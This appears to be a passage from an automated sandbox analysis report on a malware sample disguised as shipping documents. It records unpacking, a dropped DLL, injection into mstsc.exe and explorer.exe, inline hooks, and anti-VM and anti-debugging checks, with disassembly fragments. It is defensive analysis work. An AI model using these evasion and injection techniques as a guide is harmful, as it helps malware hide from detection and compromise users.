          Source: Binary string: mstsc.pdbGCTL source: 202139769574 Shipping Documents.exe, 00000002.00000002.701928540.0000000002700000.00000040.00000001.sdmp
          Source: Binary string: mstsc.pdb source: 202139769574 Shipping Documents.exe, 00000002.00000002.701928540.0000000002700000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000000.671162738.0000000005A00000.00000002.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeUnpacked PE file: 2.2.202139769574 Shipping Documents.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00416950 push eax; retf
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_0041C167 push ebp; iretd
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00417237 push es; retf
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00416BCC push cs; retf
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_0040E394 push ebp; ret
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00416486 push ecx; retf
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_0041DD91 push edi; ret
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_0041DE8C push FFFFFF81h; ret
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_0041CEB5 push eax; ret
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_0041CF6C push eax; ret
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_0041CF02 push eax; ret
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_0041CF0B push eax; ret
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_004077BF pushfd ; retf
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B0D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0483D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_00486950 push eax; retf
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0048C167 push ebp; iretd
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_00487237 push es; retf
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_00486BCC push cs; retf
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0047E394 push ebp; ret
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_00486486 push ecx; retf
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0048DD91 push edi; ret
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0048DE8C push FFFFFF81h; ret
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0048CEB5 push eax; ret
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0048CF6C push eax; ret
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0048CF0B push eax; ret
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0048CF02 push eax; ret
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_004777BF pushfd ; retf
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeFile created: C:\Users\user\AppData\Local\Temp\nszCE87.tmp\22m80anrrsp.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8A 0xAE 0xEE
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\mstsc.exeRDTSC instruction interceptor: First address: 00000000004798E4 second address: 00000000004798EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\mstsc.exeRDTSC instruction interceptor: First address: 0000000000479B5E second address: 0000000000479B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00409A90 rdtsc
          Source: C:\Windows\explorer.exe TID: 6160Thread sleep count: 34 > 30
          Source: C:\Windows\explorer.exe TID: 6160Thread sleep time: -68000s >= -30000s
          Source: C:\Windows\SysWOW64\mstsc.exe TID: 744Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 1_2_004059F0 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 1_2_0040659C FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 1_2_004027A1 FindFirstFileA,
          Source: explorer.exe, 00000004.00000000.669826337.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000004.00000000.680935628.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.672497965.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.680935628.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000002.917276050.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000004.00000000.681240089.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000004.00000000.669826337.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000004.00000000.669826337.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000004.00000000.681489254.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: explorer.exe, 00000004.00000000.669826337.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\mstsc.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_0040ACD0 LdrLoadDll,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 1_2_10001000 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AEF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AEF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AEF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AB9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B33884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B33884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AB58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B4B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B4B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B4B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B4B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B4B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B4B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ACB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ACB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ACB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ACB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B37016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B37016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B37016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B84015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B84015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B72073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B81074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AD0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AD0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B369A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AEA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ADC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ABB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ABB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ABB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B441E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AD4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AD4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AD4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AD4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AD4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AB9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AB9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AB9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ABC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ABB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ABB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ADB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ADB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AB52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AB52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AB52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AB52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AB52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ACAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ACAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AEFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AED294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AED294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AD3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AB5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AB5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AB5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AB5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ABAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ABAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B6B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B6B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B88A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B7EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B44257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AB9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AB9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AB9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AB9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B85BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B6D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B7138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AEB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ADDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B353CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B353CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B7131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ABDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B88B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ABDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ABF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B36CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B36CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B36CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B714FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B88CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AEBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B8740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B8740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B8740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B36C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B36C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B36C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B36C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AD746D mov eax, dword ptr fs:[00000030h]
